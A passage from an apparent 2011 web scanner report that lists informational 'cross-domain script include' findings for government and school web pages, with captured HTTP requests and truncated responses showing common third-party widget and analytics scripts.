Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30295279.1304124528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30295279.300828153.1304124528.1304124528.1304124528.1; __utmc=30295279; __utmb=30295279.2.10.1304124528; fsr.s={"v":1,"rid":"1304124556632_237243","pv":2,"to":5,"c":"http://www.archives.gov/veterans/military-service-records/","lc":{"d0":{"v":2,"s":false}},"sd":0,"f":1304124560808}

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>Shop</title>
<meta ht
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

20.77. http://www.archives.gov/veterans/evetrecs/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archives.gov
Path:   /veterans/evetrecs/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /veterans/evetrecs/index.html HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 00:48:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.1
refresh: 5; URL=/veterans/military-service-records/
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title> File Moved During th
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

20.78. http://www.archives.gov/veterans/military-service-records/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archives.gov
Path:   /veterans/military-service-records/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /veterans/military-service-records/ HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30295279.1304124528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30295279.300828153.1304124528.1304124528.1304124528.1; __utmc=30295279; __utmb=30295279.1.10.1304124528; fsr.s={"v":1,"rid":"1304124556632_237243","pv":1,"to":3,"c":"http://www.archives.gov/veterans/evetrecs/index.html","lc":{"d0":{"v":1,"s":false}},"sd":0}

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:48:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>Start Your Military S
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

20.79. http://www.buzgate.org/8.0/ny/fh.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzgate.org
Path:   /8.0/ny/fh.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /8.0/ny/fh.html HTTP/1.1
Host: www.buzgate.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:53 GMT
Server: Apache/2.2.17
Set-Cookie: BUZGateSessionInfo=69bc2eaab818394ecad836891008931a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: state=NY; expires=Sat, 30-Apr-2011 12:59:53 GMT; path=/
Set-Cookie: state_name=New+York; expires=Sat, 30-Apr-2011 12:59:53 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 27047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="icon" type="image/ico" href="http://buzgate.org/favicon.ico"/>


<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script><script language="javascript"
src="http://live.freesitemapgenerator.com/scripts/fsg096.js">
</script>
...[SNIP]...

20.80. http://www.capehenlopenschools.com/education/district/district.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capehenlopenschools.com
Path:   /education/district/district.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /education/district/district.php HTTP/1.1
Host: www.capehenlopenschools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:53 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=b4748176e51e34663911c7b3aa2ed59b; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 47840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
...[SNIP]...
<td>
           <script type="text/javascript" src="http://www.altavista.com/static/scripts/translate_engl.js"></script>
...[SNIP]...

20.81. http://www.centerdigitalgov.com/center/highlightstory.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centerdigitalgov.com
Path:   /center/highlightstory.phtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /center/highlightstory.phtml HTTP/1.1
Host: www.centerdigitalgov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:29:56 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7a PHP/5.2.5
X-Powered-By: PHP/5.2.5
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 13453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equ
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<SCRIPT TYPE='text/javascript' LANGUAGE='JavaScript' SRC='http://ext.govtech.com/common/elqNow/elqCfg.js'></SCRIPT>
<SCRIPT TYPE='text/javascript' LANGUAGE='JavaScript' SRC='http://ext.govtech.com/common/elqNow/elqImg.js'></SCRIPT>
...[SNIP]...

20.82. http://www.colorado.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colorado.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:21 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-store
Last-Modified: Sat, 30 Apr 2011 11:13:22 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=710475B8CD396D3A3B6A4C1A37523B52; Path=/cs
Set-Cookie: SS_X_JSESSIONID=29A408E2CEEA0BF8523CBC7D147C658F; Path=/
Set-Cookie: BIGipServer=297861130.36895.0000; Path=/
Set-Cookie: BIGipServer=180355082.20480.0000; path=/
Set-Cookie: BIGipServer=348127242.20480.0000; path=/
Content-Length: 58570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
    <hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.83. http://www.cotrip.org/device.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cotrip.org
Path:   /device.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /device.htm HTTP/1.1
Host: www.cotrip.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:07 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Set-Cookie: JSESSIONID=031980C19CBB99378384441260892E13.node1; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <meta http-equiv="pragma" content="no-cache"/>



...[SNIP]...
</script>


                   <script type="text/javascript" src="http://maps.google.com/maps/api/js?v=3.1&sensor=false&client=gme-colorado&channel=cotrip"></script>
...[SNIP]...

20.84. http://www.dds.ga.gov/drivers/DLdata.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dds.ga.gov
Path:   /drivers/DLdata.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /drivers/DLdata.aspx HTTP/1.1
Host: www.dds.ga.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=oyq2adjrds3ociihzddagwaw; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8116


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title>
           
       </title>
       <meta content="http://schemas.microsoft.com/int
...[SNIP]...
<META content="" name=KEYWORDS>
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
       </script>
...[SNIP]...

20.85. http://www.delmar.k12.de.us/education/district/district.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /education/district/district.php HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:34 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=00b424bcc64093de48b0d5db9594ffd3; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 124126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
...[SNIP]...

20.86. http://www.denvergov.org/tabid/37889/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.denvergov.org
Path:   /tabid/37889/Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tabid/37889/Default.aspx HTTP/1.1
Host: www.denvergov.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38103
Set-Cookie: .ASPXANONYMOUS=IsbLYcQ9zAEkAAAAMWI3MzQwZTMtOWE0OC00ZTc3LWExMzAtMDBhNzUzYTA3NDc50; expires=Fri, 08-Jul-2011 23:11:35 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<link id="APortals_0_" rel="stylesheet" type="text/css" href="/Portals/0/portal.css" /><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" ></script>
...[SNIP]...
</script>-->
<script type="text/javascript" src='http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.0/jquery-ui.min.js'></script>
...[SNIP]...

20.87. http://www.dol.wa.gov/onlinesvcs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dol.wa.gov
Path:   /onlinesvcs.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /onlinesvcs.html HTTP/1.1
Host: www.dol.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304162136269_813518","to":3,"c":"http://access.wa.gov/","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1304162690430}; __utmz=184417587.1304162697.1.1.utmcsr=access.wa.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=184417587.1815769971.1304162697.1304162697.1304162697.1; __utmc=184417587; __utmb=184417587.1.10.1304162697;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:55 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Mon, 11 Apr 2011 15:15:22 GMT
ETag: "2028f-2c91-4a0a60b555680"
Accept-Ranges: bytes
Content-Length: 11409
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceBeginEditable name="footing" --><script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0006/3224.js"> </script>
...[SNIP]...

20.88. http://www.dol.wa.gov/vehicleregistration/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dol.wa.gov
Path:   /vehicleregistration/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /vehicleregistration/ HTTP/1.1
Host: www.dol.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304162136269_813518","to":3,"c":"http://access.wa.gov/","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1304162690430}; __utmz=184417587.1304162697.1.1.utmcsr=access.wa.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=184417587.1815769971.1304162697.1304162697.1304162697.1; __utmc=184417587; __utmb=184417587.1.10.1304162697;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:56 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Mon, 04 Apr 2011 14:38:46 GMT
ETag: "2091f-2c8e-4a018b78d6980"
Accept-Ranges: bytes
Content-Length: 11406
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceBeginEditable name="footing" --><script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0006/3224.js"> </script>
...[SNIP]...

20.89. http://www.dyve.net/jquery/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dyve.net
Path:   /jquery/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /jquery/ HTTP/1.1
Host: www.dyve.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:59 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 973

<!DOCTYPE html>
<html>
   <head>
       <title>jQuery Plugins by Dylan Verheul</title>
       <link rel="stylesheet" type="text/css" href="main.css" />
       <script type="text/javascript" src="/jquery/js/jquery.js">
...[SNIP]...
<!-- content -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.90. http://www.ed.gov/rschstat/landing.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ed.gov
Path:   /rschstat/landing.jhtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rschstat/landing.jhtml HTTP/1.1
Host: www.ed.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Apr 2011 12:32:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Drupal-Cache: MISS
Last-Modified: Sat, 30 Apr 2011 12:32:00 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1304166720"
Location: http://www2.ed.gov/rschstat/landing.jhtml
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- /#page-inner, /#page -->


<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/9201.js"> </script>
...[SNIP]...

20.91. http://www.ehawaii.gov/dakine/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehawaii.gov
Path:   /dakine/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dakine/index.html HTTP/1.1
Host: www.ehawaii.gov
Proxy-Connection: keep-alive
Referer: http://hawaii.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:09:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 21026


<?xml version="1.0"?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<he
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.92. http://www.employment.oregon.gov/EMPLOY/ES/JOB/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employment.oregon.gov
Path:   /EMPLOY/ES/JOB/index.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /EMPLOY/ES/JOB/index.shtml HTTP/1.1
Host: www.employment.oregon.gov
Proxy-Connection: keep-alive
Referer: http://oregon.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261762387.1304162104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=191747134.1304162680.1.1.utmcsr=oregon.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=191747134.456701722.1304162680.1304162680.1304162680.1; __utma=261762387.973826526.1304162104.1304162104.1304201413.2; __utmc=261762387; __utmb=261762387.3.10.1304201413

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:08 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 21057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en">
<head>
<title>State of Oregon: Employment Department Job Listings</title>
<meta http-equiv="Content-Type" content="t
...[SNIP]...
</script>
<script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.93. http://www.employment.oregon.gov/EMPLOY/STORIES/online_filing_success.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employment.oregon.gov
Path:   /EMPLOY/STORIES/online_filing_success.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /EMPLOY/STORIES/online_filing_success.shtml HTTP/1.1
Host: www.employment.oregon.gov
Proxy-Connection: keep-alive
Referer: http://oregon.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261762387.1304162104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261762387.973826526.1304162104.1304162104.1304162104.1; __utmc=261762387; __utmb=261762387.2.10.1304162104

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:24:22 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 19721


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Employment Department Success Stories Filing unemployment insurance online saves time and effort</title>
<meta
...[SNIP]...
</script>
<script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.94. http://www.employment.oregon.gov/images/doesNotExist.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employment.oregon.gov
Path:   /images/doesNotExist.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/doesNotExist.png HTTP/1.1
Host: www.employment.oregon.gov
Proxy-Connection: keep-alive
Referer: http://www.employment.oregon.gov/EMPLOY/ES/JOB/index.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261762387.1304162104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=191747134.1304162680.1.1.utmcsr=oregon.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=191747134.456701722.1304162680.1304162680.1304162680.1; __utma=261762387.973826526.1304162104.1304162104.1304201413.2; __utmc=261762387; __utmb=261762387.3.10.1304201413

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 22:18:19 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 10473


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ERROR 404 - File Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

...[SNIP]...
</script>
<script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.95. http://www.facebook.com/TeamHaslam  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /TeamHaslam

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /TeamHaslam HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=Pi-Op; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.9.128
Connection: close
Date: Sat, 30 Apr 2011 12:32:13 GMT
Content-Length: 135590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

20.96. http://www.facebook.com/WSDOL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WSDOL

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /WSDOL HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
